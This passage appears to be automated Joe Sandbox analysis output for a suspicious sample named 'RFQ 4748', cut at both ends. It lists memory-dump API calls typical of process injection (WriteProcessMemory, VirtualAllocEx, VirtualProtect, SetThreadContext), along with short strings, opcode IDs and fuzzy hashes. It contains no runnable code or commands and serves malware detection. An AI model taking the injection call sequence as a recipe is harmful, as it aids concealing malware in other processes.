                                                              APIs
                                                              • CopyFileA.KERNEL32(?,?,?), ref: 06ADB1E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: CopyFile
                                                              • String ID:
                                                              • API String ID: 1304948518-0
                                                              • Opcode ID: 150bb991202324bd263aaa9dddd808f3009dcb760e4ba65a5a5b1bfbb92035e2
                                                              • Instruction ID: d93aa5a8d0e86852416a8f6a666faa84c4176185c0aadf945cf4642e251c9204
                                                              • Opcode Fuzzy Hash: 150bb991202324bd263aaa9dddd808f3009dcb760e4ba65a5a5b1bfbb92035e2
                                                              • Instruction Fuzzy Hash: BA518CB1D002598FDB50EFA9C8817EEBBF2FF48314F158129E816EB280D7749841CBA1
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06AD9AA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: f8a4dfb5abe7f2a6100467801b572df06ed6645aca28b1210044b4d65af4e1ff
                                                              • Instruction ID: 679948fb06d589191b31e5faed076c19deaf766cfa4e659d40a4f619bed7d4f6
                                                              • Opcode Fuzzy Hash: f8a4dfb5abe7f2a6100467801b572df06ed6645aca28b1210044b4d65af4e1ff
                                                              • Instruction Fuzzy Hash: 812135B2D003499FCB10DFAAC885BEEBBF5FF48314F108429E959A7251D7789944CBA1
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06AD9AA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 4a5c6573065cc2e1b7d79e27194161c6af66ce519f8d15ce11838924760d4287
                                                              • Instruction ID: 4b497cd2979c6fa345992a27f52ee0fafec0074608cd994d0d73819da0a44fb1
                                                              • Opcode Fuzzy Hash: 4a5c6573065cc2e1b7d79e27194161c6af66ce519f8d15ce11838924760d4287
                                                              • Instruction Fuzzy Hash: 5E2127B2D003499FCB10DFAAC885BEEBBF5FF48310F108429E919A7250D7789955CBA0
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06AD956E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: ab136d10d7a715803da48f3b7e33050e7fd4c039e0c12553463c24be855b4290
                                                              • Instruction ID: afd21a548a3dd405f82a40ce20ec9260d03f6734a9e8fa65e6efb7a30b80d526
                                                              • Opcode Fuzzy Hash: ab136d10d7a715803da48f3b7e33050e7fd4c039e0c12553463c24be855b4290
                                                              • Instruction Fuzzy Hash: 522125B5D003098FDB10DFAAC4857EEBBF5AF89324F14842AD459A7240DB78A945CBA1
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06AD997E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 1bf21dfa39b458c0036b553125c0ed471c7d42003a1e70ed3976112cecc637fa
                                                              • Instruction ID: bb72cf94b983c0f1bdf6b02a84f535acc20187249b01c9d4058d277061e81916
                                                              • Opcode Fuzzy Hash: 1bf21dfa39b458c0036b553125c0ed471c7d42003a1e70ed3976112cecc637fa
                                                              • Instruction Fuzzy Hash: 46215E759002489FCB14EFAAD844AEFBFF9EF89314F148419E51967260CB39A540CFA1
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06AD9E74
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 293c23c0d79180aec97e78fb96f1af69b8b9823384a3a2e270610b266a9eb07e
                                                              • Instruction ID: 506dd837a9f4c3c7e23592fbbae58ddc1e424be2323c7dc0a2dfc263abec4dc8
                                                              • Opcode Fuzzy Hash: 293c23c0d79180aec97e78fb96f1af69b8b9823384a3a2e270610b266a9eb07e
                                                              • Instruction Fuzzy Hash: BA2137B18002099FDB10DFAAC840AEFFBF5FF89324F148429E419A7250CB389545CFA1
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06AD956E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: ade75b62c0c615d1b68c8dd059ee3b35e88633a0486ef16fc7869d99da6e2f08
                                                              • Instruction ID: 86064174c76829c655fef293a2b56dc7415d7995a61c438a310975458703be54
                                                              • Opcode Fuzzy Hash: ade75b62c0c615d1b68c8dd059ee3b35e88633a0486ef16fc7869d99da6e2f08
                                                              • Instruction Fuzzy Hash: C72127B1D003098FDB50DFAAC4857EEBBF5EF89324F14842AD519A7240DB78A945CFA1
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06AD9E74
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 754ee4cc227e92ad8669f1cc492c565881ce15ff8cbd007fec2c89a4edafd510
                                                              • Instruction ID: 13ab84b1ebdb90d129478383c9a63b738be0866cfc30a385f1260595f626b6db
                                                              • Opcode Fuzzy Hash: 754ee4cc227e92ad8669f1cc492c565881ce15ff8cbd007fec2c89a4edafd510
                                                              • Instruction Fuzzy Hash: 2F2115B1C002098FDB10DFAAC444AEEFBF5FF89320F108429D419A7250DB78A945CFA1
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06AD997E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q
                                                              • API String ID: 0-1259897404
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TJbq
                                                              • API String ID: 0-1760495472
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TJbq
                                                              • API String ID: 0-1760495472
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (aq
                                                              • API String ID: 0-600464949
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: fbq
                                                              • API String ID: 0-3185938239
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: paq
                                                              • API String ID: 0-3273118895
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (aq
                                                              • API String ID: 0-600464949
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q
                                                              • API String ID: 0-1259897404
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: rq
                                                              • API String ID: 0-1470361113
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q
                                                              • API String ID: 0-1259897404
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: &
                                                              • API String ID: 0-1010288
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: p<]q
                                                              • API String ID: 0-1327301063
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2104924846.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6a50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q
                                                              • API String ID: 0-1259897404
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *
                                                              • API String ID: 0-163128923
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "
                                                              • API String ID: 0-123907689
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *
                                                              • API String ID: 0-163128923
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: G
                                                              • API String ID: 0-985283518
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105998096.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f60000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: <
                                                              • API String ID: 0-4251816714
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: O
                                                              • API String ID: 0-878818188
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              • Opcode ID: 60f220e68ecf80254d5d20fb870b2aa12392bcb189edfb45e7bb59b18f4f8a76
                                                              • Instruction ID: 83587c0fdc5ee88a2db43243768720b0beee1e580002c6b58e365f2d3c4b9625
                                                              • Opcode Fuzzy Hash: 60f220e68ecf80254d5d20fb870b2aa12392bcb189edfb45e7bb59b18f4f8a76
                                                              • Instruction Fuzzy Hash: B6F0D478A142288FCB60DF29C8846DDB7B2EB96300F1082959889A3344CB745EC58F81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8
                                                              • API String ID: 0-4194326291
                                                              • Opcode ID: b26e8b45544274b2c3102dcb178202147c2158e7a67dec6ba968536394fbba22
                                                              • Instruction ID: d4474b41f4039cc72423b57a938f03fc852c72aea467674e9b41428f987ac0cd
                                                              • Opcode Fuzzy Hash: b26e8b45544274b2c3102dcb178202147c2158e7a67dec6ba968536394fbba22
                                                              • Instruction Fuzzy Hash: 64F0153580065EDBCF11EF50C8406CEB736FF84310F10C686A94937210CB31AA95CF40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: G
                                                              • API String ID: 0-985283518
                                                              • Opcode ID: 8199396fbfa47510672521d13ad668ec71ca7f5c789e9d88992dbdc5ac524d91
                                                              • Instruction ID: 4ccf5a5aad5749308167486fb22b7b0235663cfa6bdb29702627a156cd5396fb
                                                              • Opcode Fuzzy Hash: 8199396fbfa47510672521d13ad668ec71ca7f5c789e9d88992dbdc5ac524d91
                                                              • Instruction Fuzzy Hash: 49D092B4A0522ECFDBA0EF20C98AB9DB7B4AF59300F5050E6C45CA7644EB309E81CF55
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 19d9c34aeeb258654528d2d4f720886b53f29af9f514e3c108efc396b48c2f2f
                                                              • Instruction ID: 9c5ab3e26bffb53e4b8b8b44f2453f7210af1b720ed2c1532d28c5a97d2cbcb0
                                                              • Opcode Fuzzy Hash: 19d9c34aeeb258654528d2d4f720886b53f29af9f514e3c108efc396b48c2f2f
                                                              • Instruction Fuzzy Hash: 215244B8A15219CFD351DF09D688E58BBF1FB00725F45C2A9D1158B266D3BAEC88CF42
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01ee6ef57321c0e9af028d33eb208886e91a7e7f7075beba75ff5a7e5c2398fa
                                                              • Instruction ID: f4855ae1ee608b45315b6d94b4f2036b112d21ca0d7bd6a10dc03af53aa859ee
                                                              • Opcode Fuzzy Hash: 01ee6ef57321c0e9af028d33eb208886e91a7e7f7075beba75ff5a7e5c2398fa
                                                              • Instruction Fuzzy Hash: F9122A34A002198FCB94EF64C994AADB7B2FF89300F5185A9D54AAB365DB30ED85CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eb989b941c9d19d021a34a7384bf21037679f48d2fdea6ebe52cdc469900caa4
                                                              • Instruction ID: e64927857790a6335079f46e7a5f2b345fb160096b985a39661c38e4c9174ddc
                                                              • Opcode Fuzzy Hash: eb989b941c9d19d021a34a7384bf21037679f48d2fdea6ebe52cdc469900caa4
                                                              • Instruction Fuzzy Hash: B4E15374E04228DFDB54EF65D884BADBBB2FB89310F1081AAD94AA7354DB346D81CF11
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a94ce8b2cb231d130d52fcbe024771af65a8acfdfa459b75a21c6fb59a91a60c
                                                              • Instruction ID: d6152e61953076c26b3f76be9fe2bfb524f3d93c99d188a404ce4f5b0662d2f2
                                                              • Opcode Fuzzy Hash: a94ce8b2cb231d130d52fcbe024771af65a8acfdfa459b75a21c6fb59a91a60c
                                                              • Instruction Fuzzy Hash: EBE15574E04228DFDB54EF65D884BADBBB2FB89310F1081AAD94AA7354DB346D80CF11
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 523e3bf13c3df579f7a3200ee84bab3e1aca6f461aa9e8e3b4955ed59e2ff267
                                                              • Instruction ID: 42e5f3412348fd7a74a9b446b996d3f8a2bae71226e45d6ab9e90066af281ea5
                                                              • Opcode Fuzzy Hash: 523e3bf13c3df579f7a3200ee84bab3e1aca6f461aa9e8e3b4955ed59e2ff267
                                                              • Instruction Fuzzy Hash: 6ED12174E04228DFDB54EF65D884BADBBB2FB89310F1181AAD94AA7354DB346D80CF11
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dd41a67fed210fe5330776ba98fa59da239625f8f2385148ff0263aa46821345
                                                              • Instruction ID: 928423c5383e5a415dab741a82548f491e5e2ea6d2f070b18faf81620c1169d7
                                                              • Opcode Fuzzy Hash: dd41a67fed210fe5330776ba98fa59da239625f8f2385148ff0263aa46821345
                                                              • Instruction Fuzzy Hash: 05A11A34A003188FCB54EF24C994BADB7B2BF89304F5185A9E54AAB365DB70ED85CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 15a08a2946fe0473272c075c030b40b9115de67f7a69f5725eed049e5d40320b
                                                              • Instruction ID: 2d29c53e269745b0524069cc9cea4cfeeb07cfd86b24e0e3ff43ae57d64cf1bd
                                                              • Opcode Fuzzy Hash: 15a08a2946fe0473272c075c030b40b9115de67f7a69f5725eed049e5d40320b
                                                              • Instruction Fuzzy Hash: 01B10974A04258DFDB94EFA8D894BADBBF1FB89304F1080AAD049AB395CB345985CF51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a194345b57ec9f8f1225a8d704f18c1a2cf2bc5a78ac6530a53863ad84b6a65a
                                                              • Instruction ID: 0922eb9dc3ea4864bd9463c68a4595d204ab449aee1070df37aae90a8f6c5192
                                                              • Opcode Fuzzy Hash: a194345b57ec9f8f1225a8d704f18c1a2cf2bc5a78ac6530a53863ad84b6a65a
                                                              • Instruction Fuzzy Hash: 97A11374E04218DFDB44EFA8D884BAEBBB2FB89315F20816AD84AA7354DB345D41CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e237d6e5487f456ca89fb192a655c19c5512f18aaa139ad5da37793cec899533
                                                              • Instruction ID: db5eb93fb4f1119f116739cc08dda67c1487a2071fecfd381888c20ef79e729b
                                                              • Opcode Fuzzy Hash: e237d6e5487f456ca89fb192a655c19c5512f18aaa139ad5da37793cec899533
                                                              • Instruction Fuzzy Hash: 2E812C34B10214DFCB94EF68D898A6EB7B6BF89700F15816AE506DB3A1CB70DC41CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 282801fe38f95ff80b23c28ea6b131091f29508f58a33513235effd7574357ab
                                                              • Instruction ID: bb928f4e925d4a553cdd03159a37c81a8673322b79ffd0037166d1f2f3a4958f
                                                              • Opcode Fuzzy Hash: 282801fe38f95ff80b23c28ea6b131091f29508f58a33513235effd7574357ab
                                                              • Instruction Fuzzy Hash: 00816C35A11208DFCB44DFA9E8A8AADBBB2FF88311F154069E9129B350CB75DD41CB54
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d68951826bf23577d86fa89898c20db4bada1471990482fb56bcab5a1b58e6ce
                                                              • Instruction ID: ac1814f2b571d0d23b7c6aca2ccebdf665f7ff62788dc1f3b330eb7905d9212d
                                                              • Opcode Fuzzy Hash: d68951826bf23577d86fa89898c20db4bada1471990482fb56bcab5a1b58e6ce
                                                              • Instruction Fuzzy Hash: 20811470E0921CDFDB10DFA9D889BADBBF2BB49314F109229D809A7265D7795D85CF00
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4174fd120f07e5404ad2245559f5ed7306a42d67898be2d5410dffe69a1bed82
                                                              • Instruction ID: ce3239e8f3c7a5bc50b00eb4581191b1d507cfcc4b2b0f3fd06e48689a3fa610
                                                              • Opcode Fuzzy Hash: 4174fd120f07e5404ad2245559f5ed7306a42d67898be2d5410dffe69a1bed82
                                                              • Instruction Fuzzy Hash: D1812370E0921CDFDB10DFA9D885BADBBF2BB49314F10922AD809A7265D7795D85CF00
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eafd5836c63d2db74289c6e924d2ef51e7aa8bb13812521087f13f4899a16561
                                                              • Instruction ID: f19b0370295028db2241972b0d506e91c46ba86975c75d1fbfd2aae816a939b0
